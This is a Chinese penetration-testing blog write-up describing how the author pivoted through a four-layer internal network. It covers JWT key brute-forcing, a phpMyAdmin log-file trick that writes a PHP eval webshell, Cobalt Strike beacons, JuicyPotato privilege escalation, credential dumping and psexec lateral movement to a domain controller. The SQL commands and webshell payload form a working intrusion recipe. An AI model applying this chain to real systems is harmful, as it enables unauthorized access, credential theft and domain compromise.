【攻防实战】Ueditor编辑器文件上传联动CS远控打穿四层内网(下)

当一个的心中有更高的山峰想去攀登时，他就不会在意脚下的泥沼，他才可能用最平静的方式，去面对一般人难以承受的痛苦

前言

网络安全技术学习，承认⾃⼰的弱点不是丑事，只有对原理了然于⼼，才能突破更多的限制。

拥有快速学习能力的安全研究员，是不能有短板的，有的只能是大量的标准板和几块长板。

知识⾯，决定看到的攻击⾯有多⼴；知识链，决定发动的杀伤链有多深。

最终成果

最终收获的成果如下

网络拓扑图

本次实战绘制出来的网络拓扑图如下：

第三层：12server-web2

信息搜集

查看内网第三层网段存活的机器

arp -a 

可以看到内网第二层网络还有一台xxx.xxx22.130机器存活

开代理访问12server-web2

通过12server-data1开代理访问12server-web2

cs服务器的地址和端口

信息搜集

代理端口扫描

目录扫描

访问

http://xxx.xxx22.130/a.php

目录扫描发现报错页面得知为phpstudy_pro

访问80端口的web服务

http://xxx.xxx22.130/

JWT爆破

登录请求中 ， 在token中发现jwt认证

jwt的特征就是前两段是base64编码（去掉==），最后一段是秘钥，然后点号拼接

爆破工具 jwt_tool（github直接下载）工具

git clone https://github.com/ticarpi/jwt_tool.git

爆破的命令

python3 jwt_tool.py xxx -C -d xxx.txt

成功爆破出秘钥：

xxx is the CORRECT key!

JWT加解密

admin用户签名后的jwt

首先对浏览器代理进行配置

其次对burp进行配置

和浏览器代理同一配置

和代理同一配置

抓取数据包修改X-token

以admin身份登陆进去，之后发现后台什么都没有

phpmyadmin写日志拿shell

根据上面目录扫描的结果得出是phpstudypro，本地搭建测试安装phpmyadmin，找到默认路径phpmyadmin4.8.5

http://xxx.xxx22.130/phpmyadmin4.8.5

root和jwt跑出的key：xxx 登陆

利用phpmyadmin日志

show variables  like  '%general%';
SET GLOBAL general_log='on'; SHOW VARIABLES LIKE '%general%';
SET GLOBAL general_log_file='C:/phpStudy_pro/www/shell.php';
SELECT '<?php eval($_POST["cmd"]);?>'

写入一句话

蚁剑连接

地址：

http://xxx.xxx22.130/shell.php

密码：

cmd

ipconfig

查看内网发现很幸运还有其他网段

whoami

查看用户权限直接是administrator权限

上线cs

12server-data1设置中转监听

选择内网可以访问到的目标

生成木马，通过蚁剑上传到12server-web2，执行木马，成功上线cs

土豆提权

JuicyPotato (ms16-075)

提权成功

获取凭据

logonpasswords 

获取凭据

查看凭据

破解凭据，得到本地管理员的账号密码：

远程连接

挂代理远程连接

成功连接

第四层：12server-data2

信息搜集

net view

查看目标

发现内网还有一台12server-data2和一台16server-dc1

查看域管

查看域控详细信息

查看域用户

获取域控NTML并进行解密

psexec进行横向

有域内机器的明文密码并且域域内机器是开放445端口的，所以可以尝试psexec进行横向。

使用cs自带插件

首先设置smb监听

从目标出发

选择内网可以访问到的目标

上线cs

成功上线cs

第四层：12server-dc1

psexec进行横向

有域控的明文密码并且域控是开放445端口的，所以可以尝试psexec进行横向。

选择内网可以访问到的目标

上线cs

成功上线cs

最终收获的成果如下

网络安全感悟

网络安全是一个长期的过程，因为网络安全没有终点，不管是网络安全企业，还是在网络安全行业各种不同方向的从业人员，不管你选择哪个方向，只有在这条路上坚持不懈，才能在这条路上走的更远，走的更好，不然你肯定走不远，迟早会转行或者被淘汰，把时间全浪费掉。

如果你觉得自己是真的热爱网络安全这个行业，坚持走下去就可以了，不用去管别人，现在就是一个大浪淘金的时代，淘下去的是沙子，留下来的才是金子，正所谓，千淘万漉虽辛苦，吹尽狂沙始到金，网络安全的路还很长，一生只做一件事，坚持做好一件事！

声明

文笔生疏，措辞浅薄，敬请各位大佬不吝赐教，万分感谢。

免责声明：由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失，均由使用者本人负责， 文章作者不为此承担任何责任。

转载声明：平凡安全 拥有对此文章的修改和解释权，如欲转载或传播此文章，必须保证此文章的完整性，包括版权声明等全部内容。未经作者允许，不得任意修改或者增减此文章的内容，不得以任何方式将其用于商业目的。

CSDN:
https://rdyx0.blog.csdn.net/

公众号：
https://mp.weixin.qq.com/mp/appmsgalbum?__biz=Mzg5NTU2NjA1Mw==&action=getalbum&album_id=1696286248027357190&scene=173&from_msgid=2247485408&from_itemidx=1&count=3&nolastread=1#wechat_redirect

博客:
https://rdyx0.github.io/

先知社区：
https://xz.aliyun.com/u/37846

SecIN:
https://www.sec-in.com/author/3097

FreeBuf：
https://www.freebuf.com/author/%E5%9B%BD%E6%9C%8D%E6%9C%80%E5%BC%BA%E6%B8%97%E9%80%8F%E6%8E%8C%E6%8E%A7%E8%80%85